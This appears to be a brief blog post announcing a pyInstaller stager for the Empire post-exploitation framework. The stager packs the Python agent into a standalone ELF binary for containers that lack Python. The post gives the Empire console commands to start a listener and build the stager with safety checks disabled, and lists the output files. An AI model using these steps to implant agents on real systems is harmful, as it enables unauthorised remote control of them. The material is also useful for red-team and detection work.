Empire AKA Empyre inside Containers without Python

Containers are designed to run a single service, hence many containers will only contain the software and other dependencies required to run that single service, hence if an attacker is able to get RCE within a container, they may still have a limited number of options because the attackers normal toolkit may rely on a dependency that is not needed by the service hosted within the container.

For example, many containers do not include a version of python pre-installed, hence if the attacker is expecting python to be on the remote target, they may be in for some disappointment. Empire 2.x beta (previously known as EmPyre) for Linux targets relies on having a 2.7 version of python on the remote target, hence it will normally not be of use within many containers because these containers do not have python installed by default.

To workaround this issue, I developed a module that will use pyInstaller bundle up the needed python dependencies and build a standalone ELF binary that can be move onto a remote target that lacks python 2.7 to get interactive with Empire on the remote target.

This module is fairly simple to use, for example just start empire and …

(Empire)> listeners
(Empire: listeners)> uselistener http
(Empire: listeners/http)> execute
(Empire: listeners/http)> agents
(Empire: agents)> usestager multi/pyinstaller
(Empire: stager/multi/pyinstaller)> set Listener http
(Empire: stager/multi/pyinstaller)> set SafeChecks False
(Empire: stager/multi/pyinstaller)> execute

By default, this pyInstaller stager will create three files in /tmp

  • emPyre -> a standalone ELF binary
  • emPyre.py -> the final python code that was compiled into the ELF binary
  • emPyre.spec -> the specifications that where used by pyInstaller to create the ELF binary

These files are provided so that you can more easily customize your future pyInstaller ELF binaries for various exploitation scenarios.

Bryce KunzComment